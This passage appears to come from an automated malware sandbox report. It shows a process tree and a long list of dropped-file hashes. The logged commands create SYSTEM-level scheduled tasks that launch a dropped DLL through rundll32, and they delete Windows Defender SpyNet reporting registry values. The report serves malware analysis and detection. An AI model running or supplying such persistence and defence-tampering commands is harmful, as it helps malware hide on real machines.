C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "SOnJrQRHBOIzCQS2" /F /xml "C:\Program Files (x86)\prTKcPnPU\gXdYrYN.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1756
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "SOnJrQRHBOIzCQS"3⤵PID:572
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "SOnJrQRHBOIzCQS"3⤵PID:1940
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NanqrZdOvBkKdb" /F /xml "C:\Program Files (x86)\KlxBVdQvPHUU2\gPWbzyl.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1760
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KDBksqNqUAzza2" /F /xml "C:\ProgramData\kLiGIkXWiwtEPvVB\RGoRQQE.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1748
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OOCvtUPQSCmMEpvCH2" /F /xml "C:\Program Files (x86)\mATVtTtwRBfYoVEuAWR\MFTfhgL.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:968
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "JamLqGqmcktsvGiVIJC2" /F /xml "C:\Program Files (x86)\wfePzGzbIQGEC\xbpkPLA.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1948
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uDKngRYOrVZAGISPK" /SC once /ST 03:47:10 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\EpsxxpNsmYaigCcr\YgYauysJ\itAUWuI.dll\",#1 /site_id 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:584
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "uDKngRYOrVZAGISPK"3⤵PID:692
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:1684
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:1388
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:1528
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:1876
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "zZBlWYGpCEMqhJzIS"3⤵PID:1712
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\EpsxxpNsmYaigCcr\YgYauysJ\itAUWuI.dll",#1 /site_id 5254032⤵PID:1784
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\EpsxxpNsmYaigCcr\YgYauysJ\itAUWuI.dll",#1 /site_id 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1372 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "uDKngRYOrVZAGISPK"4⤵PID:1244
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:676
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1288
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1316
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5c5884b830d633a05e7a4e039224b7145
SHA1009a5616c982930c1c3ef791383fbeabc9c6953f
SHA25660035822a3e1279ffb295b9444400fd3ec47baed3cc51e72c0239a21e7e877a4
SHA5128de4baaf5f2df97e0e4d24555ee9bb3b22b8a6177b7dc4baddb4f4167d3e70dda81cea6959e6f4c0778843d22cf7f017c00f411911ddbdac669015d0e256ccf7
-
Filesize
2KB
MD552007e4efd95548c1ca2ea1f1b1382ad
SHA1529fc6ca5d7f5e925823b35dfe23a872878e75f8
SHA25653f6b93edcdbc80ea1e22c7d7bd7339bbdde0673176e14973a826541125981f4
SHA512c2a5e019d463bf12ab84424100932e58a7a2cc90d1ac52c79587d3e35b8d5cbc889a0e4441be887030b3576ea95d74ba812e3e6b4f6dffbeae820d0a464e7211
-
Filesize
2KB
MD50eb51e34be17c0c5ca8f63c9801a6668
SHA175083cbfa71b13932cb17385ca9b54c0e0fa1b6c
SHA2561f84527e5314662536494fc1e31efd0b5be95e0154e59d729d360ec1aeeaecc2
SHA512cab3c16ca1b279f4911f85be6d1c0709122e00f1029e853a7223aa157e987e5a375667a16870324348e261398d372eb4635ef33707bf9e1655295ab7571f4d31
-
Filesize
2KB
MD5d9a8197e70cc129c390e2fe40ca2f926
SHA1803b945cf3ad157f5e952989c6e764a001dfb5d3
SHA256bcb9f977610bc233515eaf0faa617636a3c94dfbab5465d9a4e9ddc1e2be10ce
SHA5127810c7b6f073683739746d643ceabc4741e6c7bdbf01be918f7185256d91368521d8c3a20a83f3c8131ae6c9d56075d7104c374b4774f7d5a96e416711922713
-
Filesize
2KB
MD5ca221d8fb1aedb53c2ade05ea221f29d
SHA128641df5bdf6f601232ebdc1361ecfd446bf0100
SHA25651abaeea20fc2b70559f7e0187a224d1f048dc0d1af0bf6aca223dc2644aa157
SHA51280487e8da847e0ee7649995a60a33d320affd958dc4a4c845d3575de715eb9bb46aaa59ae86957006cf36c228065259ce4c21e9b87db0baeb521cc630c3287e6
-
Filesize
6.3MB
MD53288d27921261defdb1882f066a52d84
SHA128aecee5a6f600cca7530f9aa19def45ae19cbf4
SHA25695d440b9a48d35de8ed51f7fa761f4215bcd1cedcb579cd52eb4612562ababd0
SHA51229942ec894cdb03969e90db848e9e9f7db030dbbb177ea0f019e616347eb58db18a7eb36c3ec6b798f92598b74807b129408c92c4cab2ac8a55a416cb9656428
-
Filesize
6.3MB
MD53288d27921261defdb1882f066a52d84
SHA128aecee5a6f600cca7530f9aa19def45ae19cbf4
SHA25695d440b9a48d35de8ed51f7fa761f4215bcd1cedcb579cd52eb4612562ababd0
SHA51229942ec894cdb03969e90db848e9e9f7db030dbbb177ea0f019e616347eb58db18a7eb36c3ec6b798f92598b74807b129408c92c4cab2ac8a55a416cb9656428
-
Filesize
6.8MB
MD57fda006ad7731ecf8edfee9db58be2a4
SHA1bd2d8067247d51ffe5a7d430e8233ec9961fdfaf
SHA25633f644fc7b814d4d6fc5dc45b1c43a18cdefd0a4c884d548390d4bacdf236c36
SHA512886fb246596ed783d0ba1c35d65a17ed59a9ef90e15ba549973a126ff9d67b5300bdc568b889d46d7dc28074dcd632172bde4c29f7e576acd3fbb937cacb9de3
-
Filesize
6.8MB
MD57fda006ad7731ecf8edfee9db58be2a4
SHA1bd2d8067247d51ffe5a7d430e8233ec9961fdfaf
SHA25633f644fc7b814d4d6fc5dc45b1c43a18cdefd0a4c884d548390d4bacdf236c36
SHA512886fb246596ed783d0ba1c35d65a17ed59a9ef90e15ba549973a126ff9d67b5300bdc568b889d46d7dc28074dcd632172bde4c29f7e576acd3fbb937cacb9de3
-
Filesize
6.8MB
MD57fda006ad7731ecf8edfee9db58be2a4
SHA1bd2d8067247d51ffe5a7d430e8233ec9961fdfaf
SHA25633f644fc7b814d4d6fc5dc45b1c43a18cdefd0a4c884d548390d4bacdf236c36
SHA512886fb246596ed783d0ba1c35d65a17ed59a9ef90e15ba549973a126ff9d67b5300bdc568b889d46d7dc28074dcd632172bde4c29f7e576acd3fbb937cacb9de3
-
Filesize
6.8MB
MD57fda006ad7731ecf8edfee9db58be2a4
SHA1bd2d8067247d51ffe5a7d430e8233ec9961fdfaf
SHA25633f644fc7b814d4d6fc5dc45b1c43a18cdefd0a4c884d548390d4bacdf236c36
SHA512886fb246596ed783d0ba1c35d65a17ed59a9ef90e15ba549973a126ff9d67b5300bdc568b889d46d7dc28074dcd632172bde4c29f7e576acd3fbb937cacb9de3
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD56233342d961480f1b2d07fe543be2d43
SHA1f86fbfe078ed25f1ffb5203bcb65a15e95ae0bf1
SHA25630fbd2d45bd940331c2f9ff061a9d4d3f6b5d42e47666e2a0d1f502647f00efd
SHA51216b99267ff2cbf89c354dc9861c63650a66bc566640261295ded6fa53708802f4fd3fcb641f6f6ce91b7a33a87ba161b9ed4b27ef8dfc353bca37ed02114766c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD58b9e71a418c5e4ada79160ed4f10aff2
SHA156a28b5eb10ed50d8bf6553da084d8297d5f9fc6
SHA256b855bd50f90e138ea4d1804f5a3c1f6d843a268acd8b665d9c82c91eaacd0a44
SHA5129605f34de91121caa7a140f291101f5df9f08190377bd70467862ee0cc2b490810241d455555a2f3480e9dc0d9eddc6157c5c85910f531f68d6a6581ab9d4de8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5f1c34b3e5243eca8ec0c59f11bc971ae
SHA16f4831dee735aac5e6ab45763bdda4e56c4fa27b
SHA2566ee453e58de110a7d9d7d1d772dd27a0a3fe7d12a96c89dad60f1a62b6a9a518
SHA5129ba7162d5917440431e347083bcbef3dc54f2a2b201288205bdb2b6a2396a52461f9586900c029815c99d8d8cb6adad07d134e6b68868e8e32e28d8f4dfc79a2
-
Filesize
8KB
MD53a3690df072c948f952093771a3bbdfe
SHA14ca044f47de1d5f3b35a8c35345851cd4a74121b
SHA256c7afde85c1919629da6eaf4e6ad42eac4a276b221f6dfba2c9a58fd6f8047a2c
SHA5129fc8304fcd5e93dfd3d092e9a59b2b7c2fd8afe9b9425ce93effe75e2670c5e7d49051eaae80d2eb4237f0ecad90c8f1e60b564284aa85eda68c5844676d668e
-
Filesize
6.2MB
MD52d0e3851698020269f06eba67d280b88
SHA10567a64d9356d61ebcea696898a8a68bfd9393d5
SHA2564a4b798bef9cce85691c6cb6fb6309fd69be923795c43d8dc99ab7d37e9c4f02
SHA512c022fefe604e6a3a3532fb48e757e6d788a855a6cc093683766335f3d261787969750b56f2e31d5aba605d328a80ceb344353c995dfcfeb0bbf2b32e6bcac539
-
Filesize
6.8MB
MD57fda006ad7731ecf8edfee9db58be2a4
SHA1bd2d8067247d51ffe5a7d430e8233ec9961fdfaf
SHA25633f644fc7b814d4d6fc5dc45b1c43a18cdefd0a4c884d548390d4bacdf236c36
SHA512886fb246596ed783d0ba1c35d65a17ed59a9ef90e15ba549973a126ff9d67b5300bdc568b889d46d7dc28074dcd632172bde4c29f7e576acd3fbb937cacb9de3
-
Filesize
6.8MB
MD57fda006ad7731ecf8edfee9db58be2a4
SHA1bd2d8067247d51ffe5a7d430e8233ec9961fdfaf
SHA25633f644fc7b814d4d6fc5dc45b1c43a18cdefd0a4c884d548390d4bacdf236c36
SHA512886fb246596ed783d0ba1c35d65a17ed59a9ef90e15ba549973a126ff9d67b5300bdc568b889d46d7dc28074dcd632172bde4c29f7e576acd3fbb937cacb9de3
-
Filesize
5KB
MD53571996a97437736fa267c5a483e6040
SHA125363a8900da313c47e72d424fbd2cb65c2c5439
SHA256f9771bdf9c868e2df04640a3067b26a1ca203dc04fce1267cb196f5662d5456e
SHA512561069287cba194c936ec04622125a9d0701fb191155e7dcc98219f60c14a2d056228fe3648f2abea3638d369fce4731076791fc488986887524a7604125c19c
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
Filesize
6.3MB
MD53288d27921261defdb1882f066a52d84
SHA128aecee5a6f600cca7530f9aa19def45ae19cbf4
SHA25695d440b9a48d35de8ed51f7fa761f4215bcd1cedcb579cd52eb4612562ababd0
SHA51229942ec894cdb03969e90db848e9e9f7db030dbbb177ea0f019e616347eb58db18a7eb36c3ec6b798f92598b74807b129408c92c4cab2ac8a55a416cb9656428
-
Filesize
6.3MB
MD53288d27921261defdb1882f066a52d84
SHA128aecee5a6f600cca7530f9aa19def45ae19cbf4
SHA25695d440b9a48d35de8ed51f7fa761f4215bcd1cedcb579cd52eb4612562ababd0
SHA51229942ec894cdb03969e90db848e9e9f7db030dbbb177ea0f019e616347eb58db18a7eb36c3ec6b798f92598b74807b129408c92c4cab2ac8a55a416cb9656428
-
Filesize
6.3MB
MD53288d27921261defdb1882f066a52d84
SHA128aecee5a6f600cca7530f9aa19def45ae19cbf4
SHA25695d440b9a48d35de8ed51f7fa761f4215bcd1cedcb579cd52eb4612562ababd0
SHA51229942ec894cdb03969e90db848e9e9f7db030dbbb177ea0f019e616347eb58db18a7eb36c3ec6b798f92598b74807b129408c92c4cab2ac8a55a416cb9656428
-
Filesize
6.3MB
MD53288d27921261defdb1882f066a52d84
SHA128aecee5a6f600cca7530f9aa19def45ae19cbf4
SHA25695d440b9a48d35de8ed51f7fa761f4215bcd1cedcb579cd52eb4612562ababd0
SHA51229942ec894cdb03969e90db848e9e9f7db030dbbb177ea0f019e616347eb58db18a7eb36c3ec6b798f92598b74807b129408c92c4cab2ac8a55a416cb9656428
-
Filesize
6.8MB
MD57fda006ad7731ecf8edfee9db58be2a4
SHA1bd2d8067247d51ffe5a7d430e8233ec9961fdfaf
SHA25633f644fc7b814d4d6fc5dc45b1c43a18cdefd0a4c884d548390d4bacdf236c36
SHA512886fb246596ed783d0ba1c35d65a17ed59a9ef90e15ba549973a126ff9d67b5300bdc568b889d46d7dc28074dcd632172bde4c29f7e576acd3fbb937cacb9de3
-
Filesize
6.8MB
MD57fda006ad7731ecf8edfee9db58be2a4
SHA1bd2d8067247d51ffe5a7d430e8233ec9961fdfaf
SHA25633f644fc7b814d4d6fc5dc45b1c43a18cdefd0a4c884d548390d4bacdf236c36
SHA512886fb246596ed783d0ba1c35d65a17ed59a9ef90e15ba549973a126ff9d67b5300bdc568b889d46d7dc28074dcd632172bde4c29f7e576acd3fbb937cacb9de3
-
Filesize
6.8MB
MD57fda006ad7731ecf8edfee9db58be2a4
SHA1bd2d8067247d51ffe5a7d430e8233ec9961fdfaf
SHA25633f644fc7b814d4d6fc5dc45b1c43a18cdefd0a4c884d548390d4bacdf236c36
SHA512886fb246596ed783d0ba1c35d65a17ed59a9ef90e15ba549973a126ff9d67b5300bdc568b889d46d7dc28074dcd632172bde4c29f7e576acd3fbb937cacb9de3
-
Filesize
6.8MB
MD57fda006ad7731ecf8edfee9db58be2a4
SHA1bd2d8067247d51ffe5a7d430e8233ec9961fdfaf
SHA25633f644fc7b814d4d6fc5dc45b1c43a18cdefd0a4c884d548390d4bacdf236c36
SHA512886fb246596ed783d0ba1c35d65a17ed59a9ef90e15ba549973a126ff9d67b5300bdc568b889d46d7dc28074dcd632172bde4c29f7e576acd3fbb937cacb9de3
-
Filesize
6.2MB
MD52d0e3851698020269f06eba67d280b88
SHA10567a64d9356d61ebcea696898a8a68bfd9393d5
SHA2564a4b798bef9cce85691c6cb6fb6309fd69be923795c43d8dc99ab7d37e9c4f02
SHA512c022fefe604e6a3a3532fb48e757e6d788a855a6cc093683766335f3d261787969750b56f2e31d5aba605d328a80ceb344353c995dfcfeb0bbf2b32e6bcac539
-
Filesize
6.2MB
MD52d0e3851698020269f06eba67d280b88
SHA10567a64d9356d61ebcea696898a8a68bfd9393d5
SHA2564a4b798bef9cce85691c6cb6fb6309fd69be923795c43d8dc99ab7d37e9c4f02
SHA512c022fefe604e6a3a3532fb48e757e6d788a855a6cc093683766335f3d261787969750b56f2e31d5aba605d328a80ceb344353c995dfcfeb0bbf2b32e6bcac539
-
Filesize
6.2MB
MD52d0e3851698020269f06eba67d280b88
SHA10567a64d9356d61ebcea696898a8a68bfd9393d5
SHA2564a4b798bef9cce85691c6cb6fb6309fd69be923795c43d8dc99ab7d37e9c4f02
SHA512c022fefe604e6a3a3532fb48e757e6d788a855a6cc093683766335f3d261787969750b56f2e31d5aba605d328a80ceb344353c995dfcfeb0bbf2b32e6bcac539
-
Filesize
6.2MB
MD52d0e3851698020269f06eba67d280b88
SHA10567a64d9356d61ebcea696898a8a68bfd9393d5
SHA2564a4b798bef9cce85691c6cb6fb6309fd69be923795c43d8dc99ab7d37e9c4f02
SHA512c022fefe604e6a3a3532fb48e757e6d788a855a6cc093683766335f3d261787969750b56f2e31d5aba605d328a80ceb344353c995dfcfeb0bbf2b32e6bcac539